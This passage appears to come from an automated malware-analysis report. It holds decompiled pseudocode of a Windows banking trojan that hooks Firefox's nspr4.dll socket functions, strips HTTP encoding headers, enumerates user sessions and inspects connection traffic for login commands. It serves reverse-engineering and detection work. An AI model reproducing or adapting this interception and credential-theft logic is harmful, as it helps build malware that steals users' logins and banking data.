        				if(E00406B23() == 0 || _a8 == 0 || _a12 <= 0) {
        					L9:
        					_t111 =  *0x42000c(_a4, _a8, _a12);
        					goto L10;
        				} else {
        					EnterCriticalSection(0x42001c);
        					_t192 = _a4;
        					_t184 = E00418847(_a4);
        					_v84 = _t184;
        					if(_t184 == 0xffffffff) {
        						L8:
        						LeaveCriticalSection(0x42001c);
        						goto L9;
        					}
        					_t186 = _t184 * 0x38 +  *0x420038;
        					if( *(_t186 + 0x20) > 0) {
        						L29:
        						_t113 =  *(_t186 + 0x24);
        						_t188 =  *(_t186 + 0x20) - _t113;
        						LeaveCriticalSection(0x42001c);
        						_t195 = _a4;
        						_t114 =  *0x42000c(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
        						_v88 = _t114;
        						__eflags = _t114 - 0xffffffff;
        						if(_t114 != 0xffffffff) {
        							EnterCriticalSection(0x42001c);
        							_t115 = E00418847(_t195);
        							__eflags = _t115 - 0xffffffff;
        							if(_t115 != 0xffffffff) {
        								_t166 = _v88;
        								_t117 = _t115 * 0x38 +  *0x420038;
        								__eflags = _t166 - _t188;
        								if(_t166 != _t188) {
        									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
        									_t92 = _t117 + 0x28;
        									 *_t92 =  *(_t117 + 0x28) - 1;
        									__eflags =  *_t92;
        									_v88 = 1;
        								} else {
        									_t88 = _t117 + 0x1c; // -4325404
        									_v88 =  *(_t117 + 0x28);
        									E004111B9(E00411106( *_t88), _t88, 0, 0x10);
        								}
        							} else {
        								_v88 = _v88 | _t115;
        								 *0x420018(0xffffe890, 8);
        							}
        							LeaveCriticalSection(0x42001c);
        						}
        						L36:
        						_t111 = _v88;
        						L10:
        						return _t111;
        					}
        					if( *(_t186 + 8) > 0) {
        						L38:
        						LeaveCriticalSection(0x42001c);
        						_t197 = _a4;
        						_t121 =  *0x42000c(_a4, _a8, _a12);
        						_v88 = _t121;
        						__eflags = _t121 - 0xffffffff;
        						if(_t121 != 0xffffffff) {
        							EnterCriticalSection(0x42001c);
        							_t122 = E00418847(_t197);
        							__eflags = _t122 - 0xffffffff;
        							if(_t122 != 0xffffffff) {
        								_t172 = _t122 * 0x38 +  *0x420038;
        								_t178 =  *((intOrPtr*)(_t172 + 8));
        								__eflags = _v88 - _t178;
        								if(_v88 > _t178) {
        									E00418905(_t122);
        								} else {
        									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
        								}
        							} else {
        								_v88 = _v88 | _t122;
        								 *0x420018(0xffffe890, 8);
        							}
        							LeaveCriticalSection(0x42001c);
        						}
        						goto L36;
        					}
        					_t125 = E00418D3B( &_v76, _t192, _a8, _a12);
        					_v92 = _t125;
        					if(_t125 != 0xffffffff) {
        						__eflags = _v72;
        						if(_v72 == 0) {
        							L37:
        							E00408E76( &_v76);
        							_t128 = _v80 + _a12;
        							__eflags = _t128;
        							 *(_t186 + 8) = _t128;
        							goto L38;
        						}
        						_t130 = E004085D4( &_v76);
        						_v88 = _t130;
        						__eflags = _t130 & 0x00000001;
        						if((_t130 & 0x00000001) == 0) {
        							_v92 = 0;
        							_v88 = 0;
        							__eflags = _t130 & 0x00000002;
        							if(__eflags != 0) {
        								_t203 = E00411159(__eflags, _a8, _a12);
        								_v100 = _t203;
        								__eflags = _t203;
        								if(_t203 != 0) {
        									E00408EE0( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
        									E00411106( *(_t186 + 0x14));
        									E00411106( *((intOrPtr*)(_t186 + 4)));
        									_t149 = E00411564(_v76, _v80);
        									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
        									_t38 = _t186 + 0x18;
        									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
        									__eflags =  *_t38;
        									 *((intOrPtr*)(_t186 + 4)) = _t149;
        									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
        									 *((intOrPtr*)(_t186 + 0x10)) = _v32;
        									_v128 = E00415DE7(E00415DE7(E00415E63(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
        								} else {
        									E00408EE0(_v16, _v20);
        								}
        							}
        							__eflags = _v84 & 0x00000004;
        							if((_v84 & 0x00000004) == 0) {
        								L27:
        								__eflags = _v92;
        								if(_v92 == 0) {
        									goto L37;
        								}
        								E00408E76( &_v76);
        								_t70 = _t186 + 0x24;
        								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
        								__eflags =  *_t70;
        								 *(_t186 + 8) = _v80;
        								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
        								 *(_t186 + 0x20) = _v88;
        								 *(_t186 + 0x28) = _a12;
        								goto L29;
        							}
        							_t202 = _v92;
        							__eflags = _t202;
        							if(__eflags != 0) {
        								_t136 = _v88;
        							} else {
        								_t202 = _a8;
        								_t136 = _a12;
        							}
        							_v84 = _t136;
        							_v104 = E0041901B(_v84, __eflags, _t202, _v40, _v36,  &_v92);
        							E00411106(_v56);
        							__eflags = _v108;
        							if(_v108 != 0) {
        								__eflags = _t202 - _a8;
        								if(_t202 != _a8) {
        									E00411106(_t202);
        								}
        							} else {
        								__eflags = _t202 - _a8;
        								if(_t202 == _a8) {
        									goto L37;
        								}
        								_v92 = _t202;
        								_v88 = _v84;
        							}
        							goto L27;
        						} else {
        							E00408E76( &_v76);
        							LeaveCriticalSection(0x42001c);
        							_t111 =  *0x420018(0xffffe8a3, 0) | 0xffffffff;
        							goto L10;
        						}
        					} else {
        						E00418905(_v84);
        						E00408E76( &_v76);
        						goto L8;
        					}
        				}
        			}

        APIs
          • Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B
        • EnterCriticalSection.KERNEL32(0042001C), ref: 004197EA
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 00419848
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 0041988F
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 004199FA
        • EnterCriticalSection.KERNEL32(0042001C), ref: 00419A19
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 00419A7B
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 00419AA4
        • EnterCriticalSection.KERNEL32(0042001C), ref: 00419AC3
        • LeaveCriticalSection.KERNEL32(0042001C), ref: 00419B0B
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$Leave$Enter$ObjectSingleWait
        • String ID: Accept-Encoding$If-Modified-Since$identity
        • API String ID: 3286975823-3034467039
        • Opcode ID: a517665282843712a44bc99b5fb404d734306f815c0b257ec3ae7a83be7f45cb
        • Instruction ID: 5cc992ec4ac5a7bb6336a84082a90f235dbe752f701ce13370ecb84fd6b3d7d4
        • Opcode Fuzzy Hash: a517665282843712a44bc99b5fb404d734306f815c0b257ec3ae7a83be7f45cb
        • Instruction Fuzzy Hash: 5FA19E71504301EFCB10EF24D845A9ABBE4FF88354F104A2EF955A32A1D738ED95CB9A
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00418086(void** __eax, char _a4) {
        				void* __esi;
        				void* _t15;
        				void* _t16;
        				long _t17;
        				void* _t18;
        				void* _t19;
        				void* _t20;
        				void* _t21;
        				void* _t22;
        				struct HDC__* _t23;
        				void* _t24;
        				void* _t25;
        				void** _t41;
        
        				_t41 = __eax;
        				_t15 =  *(__eax + 0x1c);
        				if(_t15 != 0) {
        					DeleteObject(_t15);
        				}
        				_t16 = _t41[3];
        				if(_t16 != 0) {
        					CloseHandle(_t16);
        				}
        				_t17 = _t41[1];
        				if(_t17 != 0xffffffff) {
        					TlsFree(_t17);
        				}
        				_t18 = _t41[5];
        				if(_t18 != 0) {
        					CloseHandle(_t18);
        				}
        				_t19 = _t41[4];
        				if(_t19 != 0) {
        					UnmapViewOfFile(_t19);
        				}
        				_t20 =  *_t41;
        				if(_t20 != 0) {
        					_t20 = CloseHandle(_t20);
        				}
        				if(_a4 != 0) {
        					_t21 = _t41[0x56];
        					if(_t21 != 0) {
        						SelectObject(_t41[0x55], _t21);
        					}
        					_t22 = _t41[0x57];
        					if(_t22 != 0) {
        						DeleteObject(_t22);
        					}
        					_t23 = _t41[0x55];
        					if(_t23 != 0) {
        						DeleteDC(_t23);
        					}
        					_t24 = _t41[0x58];
        					if(_t24 != 0) {
        						CloseHandle(_t24);
        					}
        					_t25 = _t41[0x60];
        					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
        						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
        					}
        					_t20 = E00412B15( &(_t41[0x5f]));
        				}
        				return _t20;
        			}

















        APIs
        • DeleteObject.GDI32(?), ref: 00418099
        • CloseHandle.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180A9
        • TlsFree.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180B4
        • CloseHandle.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180C2
        • UnmapViewOfFile.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180CC
        • CloseHandle.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180D9
        • SelectObject.GDI32(?,?), ref: 004180F3
        • DeleteObject.GDI32(?), ref: 00418104
        • DeleteDC.GDI32(?), ref: 00418111
        • CloseHandle.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 00418122
        • WaitForSingleObject.KERNEL32(?,00000000,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 00418131
        • PostThreadMessageW.USER32 ref: 0041814A
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
        • String ID:
        • API String ID: 1699860549-0
        • Opcode ID: 1bc74938c939026bc6294649e60a2b535c477aece0aee8a89f9e4513dbc66d61
        • Instruction ID: 359614e0edb77f81741b0e24e21b0a670b9595fad6c316ffde1cd28e33252492
        • Opcode Fuzzy Hash: 1bc74938c939026bc6294649e60a2b535c477aece0aee8a89f9e4513dbc66d61
        • Instruction Fuzzy Hash: F8210C71700704ABD6309B799D88B97B7ECAF48741F05492DF959E33A0CF38E8858A28
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040641D(void* __ecx, void* __edx, void* __eflags) {
        				long _v8;
        				signed int _v12;
        				void _v532;
        				void* __edi;
        				unsigned int _t22;
        				void* _t30;
        				void* _t39;
        				void* _t41;
        				WCHAR* _t42;
        				void* _t43;
        				void* _t46;
        
        				_t41 = __edx;
        				_t39 = __ecx;
        				InitializeCriticalSection(0x41ec28);
        				 *0x41ebbc = 0;
        				 *0x41ec24 = 0;
        				 *0x41e58c = 0;
        				 *0x41eabc = 0;
        				 *0x41eac0 = 0;
        				InitializeCriticalSection(0x41eaa4);
        				_t42 =  &_v532;
        				E00406D1E(_t39, _t42, 0);
        				_v12 = _v12 | 0xffffffff;
        				_v8 = 0x1fe;
        				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
        				if(_t43 != 0xffffffff) {
        					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
        						_v12 = _v8;
        					}
        					CloseHandle(_t43);
        				}
        				_t22 = _v12;
        				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
        					_t22 = 0;
        				}
        				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
        				E0040F4AE( &_v532);
        				E00418C01( &_v532);
        				 *0x41e404 = 0;
        				 *0x41e484 = 0;
        				InitializeCriticalSection("hl�A");
        				E00418161(_t41);
        				if(GetModuleHandleW(L"nspr4.dll") == 0) {
        					_t30 = 0;
        				} else {
        					_t30 = E0040EF97(0, _t41, _t29);
        				}
        				if(_t30 != 0) {
        					 *0x41ec5c =  *0x41ec5c | 0x00000001;
        				}
        				E0040ED74();
        				return 1;
        			}















        APIs
        • InitializeCriticalSection.KERNEL32(0041EC28,00000000,74B04EE0,00000000), ref: 00406434
        • InitializeCriticalSection.KERNEL32(0041EAA4), ref: 0040645D
          • Part of subcall function 00406D1E: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041E5F0,00000000,00000032,?,77E49EB0,00000000), ref: 00406D97
        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00406485
        • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 004064A2
        • CloseHandle.KERNEL32(00000000), ref: 004064B3
        • InitializeCriticalSection.KERNEL32(hlA), ref: 004064FA
        • GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00406506
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
        • String ID: hlA$nspr4.dll
        • API String ID: 1155594396-157834734
        • Opcode ID: 32a0e5709f7ff4511ad30742ad47f4ef14c6b276f994843e25bdd32ef71faf1f
        • Instruction ID: 7862906d76c7f3752746b64df8a201ac02792f24f1b49d42e0b26332122835ca
        • Opcode Fuzzy Hash: 32a0e5709f7ff4511ad30742ad47f4ef14c6b276f994843e25bdd32ef71faf1f
        • Instruction Fuzzy Hash: FF21C135500208ABC710AFAA9D85AEE7BA8BB44314F10457FF816F32E0D6784A968F5C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 82%
        			E0040591C(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
        				char _v536;
        				char _v652;
        				char _v664;
        				char _v696;
        				char _v700;
        				char _v701;
        				char _v708;
        				void* __esi;
        				char* _t35;
        				void* _t40;
        				char* _t43;
        				intOrPtr _t44;
        				void* _t47;
        				void* _t54;
        				void* _t56;
        				intOrPtr _t57;
        				signed int _t58;
        				signed int _t60;
        				void* _t61;
        				signed int* _t71;
        				intOrPtr _t73;
        				signed int _t75;
        				signed char _t76;
        				intOrPtr _t79;
        				signed int _t80;
        				intOrPtr _t83;
        				signed int* _t84;
        				intOrPtr _t85;
        				void* _t87;
        				char* _t92;
        				void* _t93;
        				intOrPtr* _t94;
        
        				_t80 = __edx;
        				_t87 = __eax;
        				_t71 = __ecx;
        				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
        					L51:
        					_t35 = 0;
        					__eflags = 0;
        				} else {
        					if(__eax <= 6) {
        						L24:
        						__eflags = _t87 - 1;
        						if(_t87 <= 1) {
        							goto L51;
        						} else {
        							EnterCriticalSection(0x41e46c);
        							_t83 = E00405814(_a4);
        							__eflags = _t83;
        							if(_t83 != 0) {
        								__eflags =  *((intOrPtr*)(_t83 + 4));
        								if( *((intOrPtr*)(_t83 + 4)) == 0) {
        									L48:
        									_push(0);
        									goto L49;
        								} else {
        									__eflags =  *((intOrPtr*)(_t83 + 8));
        									if( *((intOrPtr*)(_t83 + 8)) == 0) {
        										goto L48;
        									} else {
        										__eflags = _t87 - 3;
        										if(_t87 < 3) {
        											L33:
        											__eflags = _t87 - 4;
        											if(_t87 >= 4) {
        												_t75 =  *_t71 ^ 0x0200099a;
        												__eflags = _t75 - 0x475050ce;
        												if(_t75 == 0x475050ce) {
        													goto L37;
        												} else {
        													__eflags = _t75 - 0x56414cdc;
        													if(_t75 == 0x56414cdc) {
        														goto L37;
        													} else {
        														__eflags = _t75 - 0x545348ca;
        														if(_t75 != 0x545348ca) {
        															__eflags = _t75 - 0x56415dc9;
        															if(_t75 == 0x56415dc9) {
        																L40:
        																_t76 = 0x65;
        																_push(0x13);
        																goto L41;
        															} else {
        																__eflags = _t75 - 0x565340d6;
        																if(_t75 == 0x565340d6) {
        																	goto L40;
        																}
        															}
        														} else {
        															goto L37;
        														}
        													}
        												}
        											}
        										} else {
        											_t58 =  *_t71;
        											__eflags = _t58 - 0x43;
        											if(_t58 == 0x43) {
        												L31:
        												__eflags = _t71[0] - 0x57;
        												if(_t71[0] != 0x57) {
        													goto L33;
        												} else {
        													__eflags = _t71[0] - 0x44;
        													if(_t71[0] == 0x44) {
        														L37:
        														_t76 = 0x64;
        														_push(0x12);
        														L41:
        														_pop(_t40);
        														E0040CA33(_t40,  &_v696);
        														_t43 =  &_v652;
        														_v700 = 0x80;
        														__imp__#5(_a4, _t43,  &_v700);
        														__eflags = _t43;
        														if(_t43 == 0) {
        															_t78 =  &_v664;
        															_t44 = E0041448A( &_v664);
        															__eflags = _t44;
        															if(_t44 == 0) {
        																__eflags = _t76 - 0x65;
        																if(_t76 == 0x65) {
        																	L46:
        																	E00414441( &_v664, _t78,  &_v536);
        																	_t47 = 0x11;
        																	E0040CA33(_t47,  &_v696);
        																	_push( &_v536);
        																	_push( *((intOrPtr*)(_t83 + 8)));
        																	_push( *((intOrPtr*)(_t83 + 4)));
        																	E00410F70(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
        																} else {
        																	__eflags = _t76 - 0x64;
        																	if(_t76 == 0x64) {
        																		_t92 =  &_v696;
        																		_t54 = 0x14;
        																		E0040CA33(_t54, _t92);
        																		_push( *((intOrPtr*)(_t83 + 4)));
        																		_t80 = _t80 | 0xffffffff;
        																		_t56 = 9;
        																		_t78 = _t92;
        																		_t57 = E00411D16(_t56, _t92, _t80);
        																		__eflags = _t57;
        																		if(_t57 != 0) {
        																			goto L46;
        																		}
        																	}
        																}
        															}
        														}
        														_push(0);
        														L49:
        														E004058B3(_t83);
        													} else {
        														goto L33;
        													}
        												}
        											} else {
        												__eflags = _t58 - 0x50;
        												if(_t58 != 0x50) {
        													goto L33;
        												} else {
        													goto L31;
        												}
        											}
        										}
        									}
        								}
        							}
        							_t73 = 0;
        							goto L23;
        						}
        					} else {
        						_t60 =  *__ecx ^ 0x0200099a;
        						if(_t60 == 0x50455acf || _t60 == 0x515348ca) {
        							if(_t71[1] != 0x20) {
        								goto L24;
        							} else {
        								_t61 = 0;
        								_t93 = _t87 + 0xfffffffb;
        								_t84 =  &(_t71[1]);
        								if(_t93 == 0) {
        									goto L51;
        								} else {
        									while(1) {
        										_t79 =  *((intOrPtr*)(_t61 + _t84));
        										if(_t79 == 0xd || _t79 == 0xa) {
        											break;
        										}
        										if(_t79 < 0x20) {
        											goto L51;
        										} else {
        											_t61 = _t61 + 1;
        											if(_t61 < _t93) {
        												continue;
        											} else {
        												break;
        											}
        										}
        										goto L52;
        									}
        									if(_t61 == 0 || _t61 == _t93) {
        										goto L51;
        									} else {
        										_t85 = E00411346(_t61, 0xfde9, _t84);
        										if(_t85 == 0) {
        											goto L51;
        										} else {
        											_v701 = 0;
        											EnterCriticalSection(0x41e46c);
        											_t94 = E00405814(_a4);
        											if(_t94 != 0) {
        												L18:
        												__eflags =  *_t71 - 0x55;
        												_v701 = 1;
        												if( *_t71 != 0x55) {
        													E00411106( *((intOrPtr*)(_t94 + 8)));
        													 *((intOrPtr*)(_t94 + 8)) = _t85;
        												} else {
        													E004058B3(_t94, 1);
        													 *((intOrPtr*)(_t94 + 4)) = _t85;
        												}
        												 *_t94 = _a4;
        											} else {
        												_t94 = E0040584D(_a4);
        												if(_t94 != 0) {
        													goto L18;
        												} else {
        													E00411106(_t85);
        												}
        											}
        											_t73 = _v701;
        											L23:
        											LeaveCriticalSection(0x41e46c);
        											_t35 = _t73;
        										}
        									}
        								}
        							}
        						} else {
        							goto L24;
        						}
        					}
        				}
        				L52:
        				return _t35;
        			}




































        APIs
        • EnterCriticalSection.KERNEL32(0041E46C,0000FDE9,?), ref: 004059D1
        • LeaveCriticalSection.KERNEL32(0041E46C,?,000000FF), ref: 00405A2C
        • EnterCriticalSection.KERNEL32(0041E46C), ref: 00405A47
        • getpeername.WS2_32 ref: 00405AF4
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: CriticalSection$Enter$Leavegetpeername
        • String ID: $D$U$W
        • API String ID: 1099368488-576695944
        • Opcode ID: 76718a06efdcb1592042b49ff1d6bf360cf32fa7fa6e1b7dfb04c82cf0b6f87a
        • Instruction ID: 613b8555dc056e80d60bd9ef7ddf7f70cddc72d05eeac635999db45cf45a7b78
        • Opcode Fuzzy Hash: 76718a06efdcb1592042b49ff1d6bf360cf32fa7fa6e1b7dfb04c82cf0b6f87a
        • Instruction Fuzzy Hash: 51513831A00B019EDF30AA658885BAB77A4DB41720F14463BED54B72E1D77CAC85CF9E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 41%
        			E00404CFC(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
        				struct HINSTANCE__* _v8;
        				char _v12;
        				char _v16;
        				_Unknown_base(*)()* _v20;
        				intOrPtr _v24;
        				char _v40;
        				char _v60;
        				char _v84;
        				char _v112;
        				void* __edi;
        				void* __esi;
        				struct HINSTANCE__* _t29;
        				_Unknown_base(*)()* _t41;
        				intOrPtr _t43;
        				signed char _t49;
        				signed char _t50;
        				signed char _t51;
        				intOrPtr* _t55;
        				void* _t57;
        				void* _t58;
        				signed char* _t59;
        				CHAR* _t61;
        				CHAR* _t62;
        				CHAR* _t63;
        				_Unknown_base(*)()* _t64;
        				WCHAR* _t66;
        				void* _t68;
        
        				_t58 = __ecx;
        				_t66 =  &_v112;
        				E0040CA33(0xdd, _t66);
        				_t29 = LoadLibraryW(_t66);
        				_v8 = _t29;
        				if(_t29 != 0) {
        					_t61 =  &_v84;
        					E0040C9FD(0xde, _t61);
        					_t55 = GetProcAddress(_v8, _t61);
        					_t62 =  &_v40;
        					E0040C9FD(0xdf, _t62);
        					_v20 = GetProcAddress(_v8, _t62);
        					_t63 =  &_v60;
        					E0040C9FD(0xe0, _t63);
        					_t41 = GetProcAddress(_v8, _t63);
        					_t68 = 0;
        					_t64 = _t41;
        					if(_t55 == 0 || _v20 == 0 || _t64 == 0) {
        						L17:
        						return FreeLibrary(_v8);
        					} else {
        						_t43 = E004127D2(L"SeTcbPrivilege");
        						__imp__WTSGetActiveConsoleSessionId();
        						_v24 = _t43;
        						if(_t43 != 0xffffffff) {
        							E00404C8B(_t58, 0, _t64, _t43, _a4, _a8);
        						}
        						_push( &_v12);
        						_push( &_v16);
        						_push(1);
        						_push(_t68);
        						_push(_t68);
        						if( *_t55() == 0) {
        							goto L17;
        						} else {
        							_t57 = 0;
        							if(_v12 <= _t68) {
        								L16:
        								_v20(_v16);
        								goto L17;
        							} else {
        								goto L8;
        							}
        							do {
        								L8:
        								_t59 = _t68 + _v16;
        								_t19 =  &(_t59[8]); // 0x0
        								_t49 =  *_t19;
        								if(_t49 == 0 || _t49 == 4) {
        									_t50 =  *_t59;
        									if(_t50 == _v24) {
        										goto L14;
        									}
        									_push(_a8);
        									_t51 = _t50 | 0x000000ff;
        									if(_t51 != 0) {
        										goto L15;
        									}
        									_push(_t51);
        									_push(_t64);
        									E00404C8B(_t59, _t68);
        									goto L14;
        								} else {
        									L14:
        									_t57 = _t57 + 1;
        								}
        								L15:
        								_t68 = _t68 + 0xc;
        							} while (_t57 < _v12);
        							goto L16;
        						}
        					}
        				}
        				return _t29;
        			}































        APIs
        • LoadLibraryW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00405692,?,?), ref: 00404D13
        • GetProcAddress.KERNEL32(?,?), ref: 00404D3F
        • GetProcAddress.KERNEL32(?,?), ref: 00404D56
        • GetProcAddress.KERNEL32(?,?), ref: 00404D6E
        • FreeLibrary.KERNEL32(?), ref: 00404DF7
          • Part of subcall function 004127D2: GetCurrentThread.KERNEL32 ref: 004127E2
          • Part of subcall function 004127D2: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127E9
          • Part of subcall function 004127D2: OpenProcessToken.ADVAPI32(000000FF,00000020,00404D8B,?,?,?,?,00404D8B,SeTcbPrivilege), ref: 004127FB
        • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege,?,?,?,?,?,?,?,?,?,?,?,00405692,?,?,00000000), ref: 00404D8B
          • Part of subcall function 00404C8B: EqualSid.ADVAPI32(00000000,0000000C,?,00404E04,?,00404DE5,00404E04,?,00000001,?,004073EC,?,?), ref: 00404CB0
          • Part of subcall function 00404C8B: CloseHandle.KERNEL32(?,?,00404E04,?,00404DE5,00404E04,?,00000001,?,004073EC,?,?), ref: 00404CF1
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
        • String ID: .exe$SeTcbPrivilege
        • API String ID: 1107370034-552748125
        • Opcode ID: 36611e2bc1cce1dc6af0e9181e778d97d2cc0a1f2ffdfb95400c44fe3566c085
        • Instruction ID: 231b8748e2783aa9f331c36a96346574f88f4befcfe14207610f6bee849b305b
        • Opcode Fuzzy Hash: 36611e2bc1cce1dc6af0e9181e778d97d2cc0a1f2ffdfb95400c44fe3566c085
        • Instruction Fuzzy Hash: FB316EB5A00218ABDF21ABA5CC849EF7B79EF84314B14017AF911F6290C6749E41DBA4
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 90%
        			E00412DEE(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
        				long _t18;
        				char* _t21;
        				signed int _t29;
        				char* _t30;
        				void* _t32;
        
        				_t29 = _a20 & 0x00000002;
        				_t18 = 0x8404f700;
        				if(_t29 != 0) {
        					_t18 = 0x8444f700;
        				}
        				if((_a20 & 0x00000004) != 0) {
        					_t18 = _t18 | 0x00800000;
        				}
        				_t30 = "POST";
        				if((_a20 & 0x00000001) == 0) {
        					_t30 = "GET";
        				}
        				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, 0x41e000, _t18, 0);
        				if(_t32 == 0) {
        					L15:
        					return 0;
        				} else {
        					if(_t29 == 0) {
        						_push(0x13);
        						_t21 = "Connection: close\r\n";
        						_pop(0);
        					} else {
        						_t21 = 0;
        					}
        					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
        						L14:
        						InternetCloseHandle(_t32);
        						goto L15;
        					} else {
        						_a20 = _a20 & 0x00000000;
        						_a8 = 4;
        						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
        							goto L14;
        						} else {
        							return _t32;
        						}
        					}
        				}
        			}









        APIs
        • HttpOpenRequestA.WININET(00000000,POST,?,HTTP/1.1,00000000,0041E000,8404F700,00000000), ref: 00412E36
        • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00412E5D
        • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00412E82
        • InternetCloseHandle.WININET(00000000), ref: 00412E9A
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp
        Similarity
        • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
        • String ID: Connection: close$GET$HTTP/1.1$POST
        • API String ID: 3080274660-1621676011
        • Opcode ID: 67e7a7ea8234f1c65cc63a820131d1aa8ab9f65b6763e73ab6c503d54146cafd
        • Instruction ID: d71f00b97df3dc17c31419508aed9241af78fafd4180e64e744a4f9f4b88ddfd
        • Opcode Fuzzy Hash: 67e7a7ea8234f1c65cc63a820131d1aa8ab9f65b6763e73ab6c503d54146cafd
        • Instruction Fuzzy Hash: 2D11637120031A6BEB218E50DE45FEB3A9CEB18755F144026FE05E92A1D7F8DDA087EC
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 83%
        			E0040EF97(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
        				void* __ebx;
        				_Unknown_base(*)()* _t4;
        				void* _t9;
        				void* _t10;
        				void* _t11;
        				void* _t12;
        
        				_t12 = __edx;
        				_t11 = __ecx;
        				 *0x41e340 = GetProcAddress(__edi, "PR_OpenTCPSocket");
        				 *0x41e350 = GetProcAddress(__edi, "PR_Close");
        				 *0x41e360 = GetProcAddress(__edi, "PR_Read");
        				_t4 = GetProcAddress(__edi, "PR_Write");
        				_push(0x41e340);
        				_t9 = 4;
        				 *0x41e370 = _t4;
        				_t10 = E0040ECE3(_t9, _t11, _t12);
        				if(_t10 != 0) {
        					E00418CBA(__edi,  *0x41e348,  *0x41e358,  *0x41e368,  *0x41e378);
        				}
        				return _t10;
        			}










        APIs
        • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 0040EFA5
